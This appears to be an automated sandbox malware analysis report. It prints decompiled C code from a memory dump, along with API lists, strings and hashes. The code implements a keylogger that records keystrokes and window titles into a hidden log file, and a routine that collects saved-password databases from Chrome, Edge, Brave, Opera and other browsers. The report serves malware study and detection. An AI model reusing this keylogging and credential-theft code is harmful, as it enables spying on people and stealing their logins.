0x00000000
0x00000000
0x00000000
0x0103829d
0x01038218
0x01038218
0x0103821b
0x00000000
0x00000000
0x0103821d
0x0103822c
0x01038239
0x01038241
0x0103824b
0x01038257
0x0103825c
0x00000000
0x0103825c
0x0103816e
0x00000000
0x00000000
0x0103817f
0x01038202
0x0103820b
0x00000000
0x0103820b
0x01038181
0x01038184
0x01038187
0x00000000
0x00000000
0x0103818d
0x00000000
0x01038194
0x00000000
0x00000000
0x0103819e
0x00000000
0x00000000
0x010381a8
0x00000000
0x00000000
0x010381b2
0x00000000
0x00000000
0x010381bc
0x00000000
0x00000000
0x010381c6
0x00000000
0x00000000
0x010381d0
0x00000000
0x00000000
0x010381da
0x00000000
0x00000000
0x010381e4
0x00000000
0x00000000
0x010381ee
0x00000000
0x00000000
0x01038570
0x01038570
0x01038581
0x01038581

APIs

GetAsyncKeyState.USER32(00000010), ref: 01038176
CallNextHookEx.USER32(00000000,?,?,?), ref: 01038577

Part of subcall function 010385CB: GetForegroundWindow.USER32(?,?,?), ref: 010385F4
Part of subcall function 010385CB: GetWindowTextW.USER32 ref: 01038607
Part of subcall function 010385CB: lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 01038670
Part of subcall function 010385CB: CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000,?,?), ref: 010386DE
Part of subcall function 010385CB: lstrlenW.KERNEL32(01047A60,00000008,00000000,?,?), ref: 01038707
Part of subcall function 010385CB: WriteFile.KERNEL32(?,01047A60,00000000,?,?), ref: 01038713

Strings

[DEL], xrefs: 01038329
[ESC], xrefs: 010382D8
[INSERT], xrefs: 01038333
[CAPS], xrefs: 010382E2
[CTRL], xrefs: 010383E6
[TAB], xrefs: 010382AC
[BKSP], xrefs: 010382B6
[ALT], xrefs: 0103843D
[ENTER], xrefs: 010382A2

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: FileWindowlstrlen$AsyncCallCreateForegroundHookNextStateTextWrite
String ID: [ALT]$[BKSP]$[CAPS]$[CTRL]$[DEL]$[ENTER]$[ESC]$[INSERT]$[TAB]
API String ID: 2452648998-4143582258
Opcode ID: 86e6f032e04507315d0c95d95009d45fb1042faad89c1b6ddbab1c13e164abfc
Instruction ID: a9262d68eb70921b248d6f3fa591e0bb4685cadf3601d533e1dc5ab5ae99394f
Opcode Fuzzy Hash: 86e6f032e04507315d0c95d95009d45fb1042faad89c1b6ddbab1c13e164abfc
Instruction Fuzzy Hash: 0E91CFB6A049008BEA69516CC6D827D396DB7C1600F41C7FBFBC367AD9DB118E458383

Uniqueness

Uniqueness Score: -1.00%

Function 01038793 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 277
registrystringwindowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E01038793(void* __ecx, void* __eflags, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				char _v524;
				short _v564;
				intOrPtr _v568;
				short _v570;
				short _v572;
				long _v596;
				char _v600;
				int _v604;
				char _v612;
				intOrPtr _v616;
				struct _OVERLAPPED* _v620;
				char _v624;
				char _v628;
				void* _v632;
				char _v636;
				intOrPtr _v640;
				struct _OVERLAPPED* _v644;
				char _v648;
				void* _t76;
				short _t77;
				void* _t82;
				char* _t84;
				struct _OVERLAPPED** _t86;
				long _t88;
				intOrPtr _t93;
				intOrPtr* _t96;
				long _t100;
				intOrPtr _t101;
				WCHAR* _t102;
				intOrPtr _t104;
				void* _t105;
				long _t109;
				void* _t110;
				intOrPtr _t111;
				intOrPtr _t113;
				long _t116;
				intOrPtr _t117;
				intOrPtr _t119;
				long _t121;
				intOrPtr _t122;
				intOrPtr _t124;
				void* _t126;
				intOrPtr _t128;
				intOrPtr _t130;
				long _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				DWORD* _t136;
				long _t137;
				intOrPtr _t138;
				long _t142;
				void* _t152;
				long _t164;
				intOrPtr _t178;
				intOrPtr _t189;
				void* _t195;
				struct _OVERLAPPED* _t198;
				struct _OVERLAPPED* _t201;
				void* _t204;
				void* _t206;
				void* _t208;
				signed int _t209;
				void* _t212;
				void* _t213;

				_t198 = 0;
				_v600 = 0;
				E01031052( &_v524, 0, 0x208);
				_t212 = (_t209 & 0xfffffff8) - 0x25c + 0xc;
				_t201 = 0;
				_v604 = 0;
				_t76 = _a8 - 1;
				if(_t76 == 0) {
					_t77 = 6;
					_v570 = _t77;
					__eflags = 1;
					_v564 = _a4;
					_v568 = 0x130;
					_v572 = 1;
					__imp__RegisterRawInputDevices( &_v572, 1, 0xc);
				} else {
					_t82 = _t76 - 0xf;
					if(_t82 == 0) {
						PostQuitMessage(0);
					} else {
						if(_t82 == 0xef) {
							_t84 =  &_v600;
							__imp__GetRawInputData(_a16, 0x10000003, 0, _t84, 0x10);
							__eflags = _t84 - 0xffffffff;
							if(_t84 != 0xffffffff) {
								_t164 = E01036099(_v620);
								_v596 = _t164;
								__eflags = _t164;
								if(_t164 != 0) {
									_t86 =  &_v620;
									__imp__GetRawInputData(_a16, 0x10000003, _t164, _t86, 0x10);
									__eflags = _t86 - _v640;
									if(_t86 == _v640) {
										__eflags =  *((intOrPtr*)(_t164 + 0x18)) - 0x100;
										if( *((intOrPtr*)(_t164 + 0x18)) == 0x100) {
											_t88 = GetWindowTextW(GetForegroundWindow(),  &_v564, 0x104);
											__eflags = _t88;
											if(_t88 <= 0) {
												E01033411( &_v644, _t195, L"Unknow");
											} else {
												E01033549( &_v648, E010336F7( &_v636,  &_v564));
												E01035FEB(_v644);
											}
											E01038C13( &_v632,  *((intOrPtr*)(_t164 + 0x16)));
											E01033549( &_v632,  &_v644);
											_t93 =  *0x105675c; // 0x0
											E0103357C( &_v624,  *((intOrPtr*)(_t164 + 0x16)), __eflags, _t93 + 0x10);
											_t96 =  *0x105675c; // 0x0
											__eflags =  *_t96 - _t198;
											if( *_t96 != _t198) {
												_t213 = _t212 - 0x10;
												__eflags = _t96 + 0xa18;
												E010313B3(_t213, _t96 + 0xa18, _t96 + 0xa18);
												_t208 = _t213 - 0x10;
												E0103373F(_t208,  &_v636);
												 *((intOrPtr*)(_t208 + 4)) = _v636;
												 *((short*)(_t208 + 8)) = _v632;
												E0103373F(_t208 + 0xc,  &_v628);
												_t152 = E01034A78( &_v612, __eflags);
												_t189 =  *0x105675c; // 0x0
												E01035044( *((intOrPtr*)(_t189 + 0xa50)), _t152);
												E01034A4E( &_v648);
												_t96 =  *0x105675c; // 0x0
											}
											__eflags =  *((intOrPtr*)(_t96 + 0xa14)) - _t198;
											if( *((intOrPtr*)(_t96 + 0xa14)) != _t198) {
												_t100 = lstrlenW(_t96 + 0x210);
												__eflags = _t100;
												_t101 =  *0x105675c; // 0x0
												if(_t100 == 0) {
													L17:
													_t102 = _t101 + 0x210;
													__eflags = _t102;
													lstrcpyW(_t102, _v632);
													_t104 =  *0x105675c; // 0x0
													 *(_t104 + 0xa10) = _t198;
												} else {
													_t142 = E0103335A( &_v648, E010336F7( &_v636, _t101 + 0x210));
													E01035FEB(_v644);
													_t101 =  *0x105675c; // 0x0
													_v644 = _t198;
													__eflags = _t142;
													if(_t142 == 0) {
														goto L17;
													} else {
														 *((intOrPtr*)(_t101 + 0xa10)) = 1;
													}
												}
												_t105 = CreateFileW( *(_t104 + 0xc), 4, 1, _t198, 4, 0x80, _t198);
												_t178 =  *0x105675c; // 0x0
												 *(_t178 + 4) = _t105;
												__eflags =  *((intOrPtr*)(_t178 + 0xa10)) - _t198;
												if(__eflags == 0) {
													_t49 = _t178 + 8; // 0x8
													_t204 = L"\r\n";
													_t116 = lstrlenW(_t204);
													_t117 =  *0x105675c; // 0x0
													WriteFile( *(_t117 + 4), _t204, _t116, _t49, _t198);
													_t119 =  *0x105675c; // 0x0
													_t121 = lstrlenW(_t204);
													_t122 =  *0x105675c; // 0x0
													WriteFile( *(_t122 + 4), _t204, _t121, _t119 + 8, _t198);
													_t124 =  *0x105675c; // 0x0
													_t126 = E01033373( &_v632);
													_t128 =  *0x105675c; // 0x0
													WriteFile( *(_t128 + 4), _v632, _t126 + _t126, _t124 + 8, _t198);
													_t130 =  *0x105675c; // 0x0
													_t206 = L"\r\n";
													_t132 = lstrlenW(_t206);
													_t133 =  *0x105675c; // 0x0
													WriteFile( *(_t133 + 4), _t206, _t132, _t130 + 8, _t198);
													_t135 =  *0x105675c; // 0x0
													_t136 = _t135 + 8;
													__eflags = _t136;
													_t137 = lstrlenW(_t206);
													_t138 =  *0x105675c; // 0x0
													WriteFile( *(_t138 + 4), _t206, _t137, _t136, _t198);
													_t178 =  *0x105675c; // 0x0
												}
												_t58 = _t178 + 8; // 0x8
												_t109 = lstrlenW(E01038B2D( *((intOrPtr*)(_v616 + 0x16)), __eflags)) + _t108;
												__eflags = _t109;
												_t110 = E01038B2D( *((intOrPtr*)(_v616 + 0x16)), _t109);
												_t111 =  *0x105675c; // 0x0
												WriteFile( *(_t111 + 4), _t110, _t109, _t58, _t198);
												_t113 =  *0x105675c; // 0x0
												CloseHandle( *(_t113 + 4));
											}
											E01035FEB(_v620);
											_v620 = _t198;
											E01035FEB(_v632);
											_t201 = _v644;
										}
									}
								}
							}
						} else {
							_t198 = DefWindowProcA(_a4, _a8, _a12, _a16);
						}
					}
				}
				E01035FEB(_t201);
				return _t198;
			}

0x010387a2
0x010387af
0x010387b3
0x010387bb
0x010387be
0x010387c0
0x010387c4
0x010387c7
0x01038af0
0x01038af3
0x01038afb
0x01038afe
0x01038b08
0x01038b10
0x01038b15
0x010387cd
0x010387cd
0x010387d0
0x01038ae6
0x010387d6
0x010387db
0x010387f8
0x01038806
0x0103880c
0x0103880f
0x0103881e
0x01038820
0x01038824
0x01038826
0x0103882e
0x0103883c
0x01038842
0x01038846
0x0103884c
0x01038853
0x0103886a
0x01038870
0x01038872
0x010388a0
0x01038874
0x01038887
0x01038890
0x01038890
0x010388ac
0x010388ba
0x010388bf
0x010388cc
0x010388d1
0x010388d6
0x010388d8
0x010388da
0x010388dd
0x010388e5
0x010388f1
0x010388f6
0x01038902
0x0103890a
0x01038913
0x0103891c
0x01038921
0x0103892e
0x01038937
0x0103893c
0x0103893c
0x01038941
0x01038947
0x01038953
0x0103895c
0x0103895e
0x01038963
0x0103899e
0x010389a2
0x010389a2
0x010389a8
0x010389ae
0x010389b3
0x01038965
0x01038979
0x01038984
0x01038989
0x0103898e
0x01038992
0x01038994
0x00000000
0x01038996
0x01038996
0x01038996
0x01038994
0x010389c8
0x010389ce
0x010389da
0x010389dd
0x010389e3
0x010389ea
0x010389ed
0x010389f4
0x010389fb
0x01038a04
0x01038a06
0x01038a11
0x01038a18
0x01038a21
0x01038a23
0x01038a35
0x01038a3d
0x01038a46
0x01038a48
0x01038a4d
0x01038a58
0x01038a5f
0x01038a68
0x01038a6a
0x01038a70
0x01038a70
0x01038a75
0x01038a7c
0x01038a85
0x01038a87
0x01038a87
0x01038a91
0x01038aa8
0x01038aa8
0x01038aab
0x01038ab1
0x01038ab9
0x01038abb
0x01038ac3
0x01038ac3
0x01038acd
0x01038ad6
0x01038ada
0x01038adf
0x01038adf
0x01038853
0x01038846
0x01038826
0x010387dd
0x010387ef
0x010387ef
0x010387db
0x010387d0
0x01038b1d
0x01038b2a

APIs

DefWindowProcA.USER32(?,?,?,?), ref: 010387E9
GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 01038806
GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 0103883C
GetForegroundWindow.USER32 ref: 01038859
GetWindowTextW.USER32 ref: 0103886A
lstrlenW.KERNEL32(-00000210,-00000010,?,Unknow), ref: 01038953
PostQuitMessage.USER32(00000000), ref: 01038AE6
RegisterRawInputDevices.USER32 ref: 01038B15

Strings

Unknow, xrefs: 01038897

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: InputWindow$Data$DevicesForegroundMessagePostProcQuitRegisterTextlstrlen
String ID: Unknow
API String ID: 3853268301-1240069140
Opcode ID: 7bed55eec9be4044e9cace1bf9c9cd9720581b03737141acbbba35cba8ba1ca5
Instruction ID: d8cd731dd8f4c546e318f9a81c747ff4030aa45809b54762c9a27dbf033fe246
Opcode Fuzzy Hash: 7bed55eec9be4044e9cace1bf9c9cd9720581b03737141acbbba35cba8ba1ca5
Instruction Fuzzy Hash: 2EA149B5104305AFD721EF68DD88EAB7BECFB98200F048999F5C697260DB36D905CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0103B917 Relevance: 35.2, Strings: 28, Instructions: 218
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0103B917(void* __edx, intOrPtr _a4) {
				char _v48;
				char _v56;
				char _v60;
				char _v324;
				intOrPtr _v328;
				char _v332;
				char _v336;
				char _v340;
				char _v344;
				intOrPtr _v352;
				void* _t31;
				intOrPtr* _t59;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t84;
				intOrPtr* _t86;
				intOrPtr* _t88;
				intOrPtr* _t90;
				intOrPtr* _t92;
				intOrPtr* _t94;
				intOrPtr* _t96;
				intOrPtr* _t98;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t108;
				intOrPtr* _t110;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t117;
				intOrPtr* _t120;
				intOrPtr _t126;
				void* _t134;
				void* _t135;
				intOrPtr _t139;
				signed int _t140;
				void* _t142;

				_t133 = __edx;
				_t142 = (_t140 & 0xfffffff8) - 0x34;
				_t72 = _a4;
				 *0x1056864 = _t72;
				_t73 =  *((intOrPtr*)(_t72 + 4));
				E01045847(_t73, __edx,  &_v48,  *((intOrPtr*)(_t72 + 8)), 0);
				_t143 = _v56;
				if(_v56 != 0) {
					_push(_t73);
					E0103315E(_t142,  &_v48);
					_t76 =  *0x1056864; // 0x0
					E01039718( *_t76, _t133, _t73);
					_t78 =  *0x1056864; // 0x0
					_t31 = E0103973F( *_t78, _t143);
					_t144 = _t31;
					if(_t31 != 0) {
						_t134 = 0x1a;
						E01040C8A( &_v56, _t134, _t144);
						_t135 = 0x1a;
						E01040C8A( &_v60, _t135, _t144);
						_t84 =  *0x1056864; // 0x0
						E0103BC0D( *_t84, _t144, L"\\Google\\Chrome\\User Data\\Default\\Login Data", L"\\Google\\Chrome\\User Data\\Local State", 0, 0, 1);
						_t86 =  *0x1056864; // 0x0
						E0103BC0D( *_t86, _t144, L"\\Epic Privacy Browser\\User Data\\Default\\Login Data", L"\\Epic Privacy Browser\\User Data\\Local State", 0, 0, 6);
						_t88 =  *0x1056864; // 0x0
						E0103BC0D( *_t88, _t144, L"\\Microsoft\\Edge\\User Data\\Default\\Login Data", L"\\Microsoft\\Edge\\User Data\\Local State", 0, 0, 7);
						_t90 =  *0x1056864; // 0x0
						E0103BC0D( *_t90, _t144, L"\\UCBrowser\\User Data_i18n\\Default\\UC Login Data.17", L"\\UCBrowser\\User Data_i18n\\Local State", 0, 1, 8);
						_t92 =  *0x1056864; // 0x0
						E0103BC0D( *_t92, _t144, L"\\Tencent\\QQBrowser\\User Data\\Default\\Login Data", L"\\Tencent\\QQBrowser\\User Data\\Local State", 0, 0, 9);
						_t94 =  *0x1056864; // 0x0
						E0103BC0D( *_t94, _t144, L"\\Opera Software\\Opera Stable\\Login Data", L"\\Opera Software\\Opera Stable\\Local State", 1, 0, 0xa);
						_t96 =  *0x1056864; // 0x0
						E0103BC0D( *_t96, _t144, L"\\Blisk\\User Data\\Default\\Login Data", L"\\Blisk\\User Data\\Local State", 0, 0, 0xb);
						_t98 =  *0x1056864; // 0x0
						E0103BC0D( *_t98, _t144, L"\\Chromium\\User Data\\Default\\Login Data", L"\\Chromium\\User Data\\Local State", 0, 0, 0xc);
						_t100 =  *0x1056864; // 0x0
						E0103BC0D( *_t100, _t144, L"\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data", L"\\BraveSoftware\\Brave-Browser\\User Data\\Local State", 0, 0, 0xd);
						_t102 =  *0x1056864; // 0x0
						E0103BC0D( *_t102, _t144, L"\\Vivaldi\\User Data\\Default\\Login Data", L"\\Vivaldi\\User Data\\Local State", 0, 0, 0xe);
						_t104 =  *0x1056864; // 0x0
						E0103BC0D( *_t104, _t144, L"\\Comodo\\Dragon\\User Data\\Default\\Login Data", L"\\Comodo\\Dragon\\User Data\\Local State", 0, 0, 0xf);
						_t106 =  *0x1056864; // 0x0
						E0103BC0D( *_t106, _t144, L"\\Torch\\User Data\\Default\\Login Data", L"\\Torch\\User Data\\Local State", 0, 0, 0x10);
						_t108 =  *0x1056864; // 0x0
						E0103BC0D( *_t108, _t144, L"\\Slimjet\\User Data\\Default\\Login Data", L"\\Slimjet\\User Data\\Local State", 0, 0, 0x11);
						_t110 =  *0x1056864; // 0x0
						E0103BC0D( *_t110, _t144, L"\\CentBrowser\\User Data\\Default\\Login Data", L"\\CentBrowser\\User Data\\Local State", 0, 0, 0x12);
						_t112 =  *0x1056864; // 0x0
						E0103A968( *_t112, _t135, _t144);
						_t114 =  *0x1056864; // 0x0
						E0103983D( *_t114, _t135, _t144);
						E0103373F(_t142,  &_v340);
						_t117 =  *0x1056864; // 0x0
						E01039E2D( *_t117, _t144,  *_t114);
						E0103373F(_t142,  &_v344);
						_t120 =  *0x1056864; // 0x0
						E0103A36F( *_t120, _t144,  *_t117);
						E010396D6(_t144);
						_t59 =  *0x1056864; // 0x0
						E010320F0( &_v340, _t144,  *_t59);
						_v328 = 0x104a830;
						E010320F0( &_v324, _t144,  &_v344);
						_t126 =  *0x1056864; // 0x0
						E01035044( *((intOrPtr*)(_t126 + 8)),  &_v332);
						E010454AA( &_v336);
						_t129 = _v352;
						if(_v352 != 0) {
							E01031AD0(_t129, _t129);
						}
						_t66 =  *0x1056864; // 0x0
						_t67 =  *_t66;
						_t130 =  *((intOrPtr*)(_t67 + 0x10));
						if( *((intOrPtr*)(_t67 + 0x10)) != 0) {
							E01035FEB(_t130);
						}
						E01035FEB(_v60);
						E01035FEB(_v56);
					}
					_t80 =  *0x1056864; // 0x0
					_t139 =  *_t80;
					E01036034(_t80);
					_t22 = _t139 + 0x24; // 0x24
					E01031F98(_t22);
				}
				E01033148( &_v48);
				return 0;
			}

0x0103b917
0x0103b91d
0x0103b920
0x0103b92a
0x0103b934
0x0103b938
0x0103b93d
0x0103b941
0x0103b947
0x0103b950
0x0103b955
0x0103b95d
0x0103b962
0x0103b96a
0x0103b96f
0x0103b971
0x0103b979
0x0103b97e
0x0103b985
0x0103b98a
0x0103b98f
0x0103b9a5
0x0103b9aa
0x0103b9c0
0x0103b9c5
0x0103b9db
0x0103b9e0
0x0103b9f7
0x0103b9fc
0x0103ba12
0x0103ba17
0x0103ba2e
0x0103ba33
0x0103ba49
0x0103ba4e
0x0103ba64
0x0103ba69
0x0103ba7f
0x0103ba86
0x0103ba9a
0x0103ba9f
0x0103bab5
0x0103baba
0x0103bad0
0x0103bad5
0x0103baeb
0x0103baf0
0x0103bb06
0x0103bb0b
0x0103bb13
0x0103bb18
0x0103bb20
0x0103bb2d
0x0103bb32
0x0103bb3a
0x0103bb47
0x0103bb4c
0x0103bb54
0x0103bb61
0x0103bb66
0x0103bb71
0x0103bb7a
0x0103bb87
0x0103bb8c
0x0103bb9a
0x0103bba3
0x0103bba8
0x0103bbae
0x0103bbb1
0x0103bbb1
0x0103bbb6
0x0103bbbb
0x0103bbbd
0x0103bbc2
0x0103bbc4
0x0103bbc4
0x0103bbcd
0x0103bbd6
0x0103bbd6
0x0103bbdb
0x0103bbe1
0x0103bbe3
0x0103bbe8
0x0103bbeb
0x0103bbeb
0x0103bbf4
0x0103bbff

Strings

\CentBrowser\User Data\Local State, xrefs: 0103BAFC
\Vivaldi\User Data\Default\Login Data, xrefs: 0103BA95
\Torch\User Data\Default\Login Data, xrefs: 0103BACB
\Chromium\User Data\Local State, xrefs: 0103BA5A
\Epic Privacy Browser\User Data\Local State, xrefs: 0103B9B6
\Torch\User Data\Local State, xrefs: 0103BAC6
\Tencent\QQBrowser\User Data\Local State, xrefs: 0103BA08
\Opera Software\Opera Stable\Local State, xrefs: 0103BA24
\Opera Software\Opera Stable\Login Data, xrefs: 0103BA29
\Comodo\Dragon\User Data\Default\Login Data, xrefs: 0103BAB0
\UCBrowser\User Data_i18n\Local State, xrefs: 0103B9ED
\Slimjet\User Data\Default\Login Data, xrefs: 0103BAE6
\Tencent\QQBrowser\User Data\Default\Login Data, xrefs: 0103BA0D
\CentBrowser\User Data\Default\Login Data, xrefs: 0103BB01
\Google\Chrome\User Data\Local State, xrefs: 0103B99B
\Epic Privacy Browser\User Data\Default\Login Data, xrefs: 0103B9BB
\UCBrowser\User Data_i18n\Default\UC Login Data.17, xrefs: 0103B9F2
\BraveSoftware\Brave-Browser\User Data\Local State, xrefs: 0103BA75
\Vivaldi\User Data\Local State, xrefs: 0103BA8E
\Comodo\Dragon\User Data\Local State, xrefs: 0103BAAB
\Blisk\User Data\Default\Login Data, xrefs: 0103BA44
\Chromium\User Data\Default\Login Data, xrefs: 0103BA5F
\Blisk\User Data\Local State, xrefs: 0103BA3F
\Google\Chrome\User Data\Default\Login Data, xrefs: 0103B9A0
\Microsoft\Edge\User Data\Local State, xrefs: 0103B9D1
\BraveSoftware\Brave-Browser\User Data\Default\Login Data, xrefs: 0103BA7A
\Microsoft\Edge\User Data\Default\Login Data, xrefs: 0103B9D6
\Slimjet\User Data\Local State, xrefs: 0103BAE1

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: FilePath$lstrcatlstrcpy$BinaryCopyExistsOpenType$CloseCombineEnumFolderInfoPrivateProfileQuerySpecialString
String ID: \Blisk\User Data\Default\Login Data$\Blisk\User Data\Local State$\BraveSoftware\Brave-Browser\User Data\Default\Login Data$\BraveSoftware\Brave-Browser\User Data\Local State$\CentBrowser\User Data\Default\Login Data$\CentBrowser\User Data\Local State$\Chromium\User Data\Default\Login Data$\Chromium\User Data\Local State$\Comodo\Dragon\User Data\Default\Login Data$\Comodo\Dragon\User Data\Local State$\Epic Privacy Browser\User Data\Default\Login Data$\Epic Privacy Browser\User Data\Local State$\Google\Chrome\User Data\Default\Login Data$\Google\Chrome\User Data\Local State$\Microsoft\Edge\User Data\Default\Login Data$\Microsoft\Edge\User Data\Local State$\Opera Software\Opera Stable\Local State$\Opera Software\Opera Stable\Login Data$\Slimjet\User Data\Default\Login Data$\Slimjet\User Data\Local State$\Tencent\QQBrowser\User Data\Default\Login Data$\Tencent\QQBrowser\User Data\Local State$\Torch\User Data\Default\Login Data$\Torch\User Data\Local State$\UCBrowser\User Data_i18n\Default\UC Login Data.17$\UCBrowser\User Data_i18n\Local State$\Vivaldi\User Data\Default\Login Data$\Vivaldi\User Data\Local State
API String ID: 2377953819-4166025770
Opcode ID: 01f7f74ed541e269b2cfab2f8deaf6c0f647f53bef6a661b9d8b912546fc2f2e
Instruction ID: 9becd9555ceb210cdacaf666c3e49ced6987fb3285ba01a6050c16a93a94dbf1
Opcode Fuzzy Hash: 01f7f74ed541e269b2cfab2f8deaf6c0f647f53bef6a661b9d8b912546fc2f2e
Instruction Fuzzy Hash: 867133B1351305ABC328FB92CDA1DAA37ADAFE9704B40466DF5D65F294CEA26800CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01038D0F Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 214
windowstringregistryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E01038D0F(void* __ecx, void* __eflags, void* _a4) {
				short _v544;
				char _v696;
				short _v704;
				char _v724;
				struct tagMSG _v748;
				struct _WNDCLASSW _v788;
				struct _SYSTEMTIME _v804;
				char _v808;
				void* _v812;
				long _v816;
				intOrPtr _t46;
				intOrPtr _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				intOrPtr _t57;
				intOrPtr _t60;
				intOrPtr _t65;
				struct HWND__* _t69;
				int _t73;
				intOrPtr _t94;
				void* _t95;
				intOrPtr _t99;
				void* _t107;
				void* _t110;
				struct HINSTANCE__* _t111;
				struct HWND__* _t112;
				void* _t114;
				signed int _t119;
				intOrPtr _t122;
				intOrPtr _t125;
				intOrPtr _t129;
				intOrPtr _t131;
				void* _t132;
				void* _t133;
				void* _t140;
				signed int _t143;
				signed int _t144;
				signed int _t146;
				void* _t150;

				_t114 = __ecx;
				_t111 = GetModuleHandleA(0);
				_v788.hIcon = 0;
				_v804.wSecond = 0;
				asm("xorps xmm0, xmm0");
				asm("stosd");
				asm("movlpd [esp+0x30], xmm0");
				asm("movlpd [esp+0x3c], xmm0");
				asm("stosd");
				asm("movlpd [esp+0x44], xmm0");
				asm("stosd");
				asm("stosd");
				_t46 =  *0x105675c; // 0x0
				E01031052(_t46 + 0x210, 0, 0x800);
				_t49 =  *0x105675c; // 0x0
				E01031052(_t49 + 0x10, 0, 0x208);
				_t52 =  *0x105675c; // 0x0
				_t150 = (_t146 & 0xfffffff8) - 0x314 + 0x18;
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t52 + 0x10, _t133, _t140, _t110);
				_t54 =  *0x105675c; // 0x0
				lstrcatW(_t54 + 0x10, L"\\Microsoft Vision\\");
				_t57 =  *0x105675c; // 0x0
				CreateDirectoryW(_t57 + 0x10, 0);
				_t60 =  *0x105675c; // 0x0
				_t153 =  *((intOrPtr*)(_t60 + 0xa14));
				if( *((intOrPtr*)(_t60 + 0xa14)) != 0) {
					E01031052( &_v544, 0, 0x208);
					_t99 =  *0x105675c; // 0x0
					_t150 = _t150 + 0xc;
					lstrcpyW( &_v544, _t99 + 0x10);
					lstrcatW( &_v544, "*");
					E010336F7(_t150,  &_v544);
					_t107 = E01041446( &_v724, _t153, _t114);
					_t129 =  *0x105675c; // 0x0
					E01031FB7(_t129 + 0xa18, _t153, _t107);
					_t131 = _v748.pt;
					_t154 = _t131;
					if(_t131 != 0) {
						E01031B27(_t131, _t131);
					}
				}
				_t132 = 4;
				_t143 = E010335B9( &_v808, _t132, _t154);
				E01033447(E0103357C( &_v812, _t132, _t154, L"ExplorerIdentifier"), _t154, _t143);
				E01035FEB(_v816);
				_t65 =  *0x105675c; // 0x0
				_v816 = 0;
				if( *((intOrPtr*)(_t65 + 0xa14)) != 0) {
					GetLocalTime( &_v804);
					wsprintfW( &_v704, L"%02d-%02d-%02d_%02d.%02d.%02d", _v804.wDay & 0x0000ffff, _v804.wMonth & 0x0000ffff, _v804.wYear & 0x0000ffff, _v804.wHour & 0x0000ffff, _v804.wMinute & 0x0000ffff, _v804.wSecond & 0x0000ffff);
					_t122 =  *0x105675c; // 0x0
					_t150 = _t150 + 0x20;
					_t26 = _t122 + 0x10; // 0x10
					E0103357C(E0103357C(_t122 + 0xc, _t132, _t122 + 0xc, _t26), _t132, _t122 + 0xc,  &_v696);
					_t94 =  *0x105675c; // 0x0
					_t95 = CreateFileW( *(_t94 + 0xc), 0x10000000, 1, 0, 2, 0x80, 0);
					_t125 =  *0x105675c; // 0x0
					 *(_t125 + 4) = _t95;
					CloseHandle(_t95);
				}
				_v788.lpszClassName = _v812;
				_v788.lpfnWndProc = E01038793;
				_v788.hInstance = _t111;
				RegisterClassW( &_v788);
				_t69 = CreateWindowExW(0, _v788.lpszClassName, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, _t111, _a4);
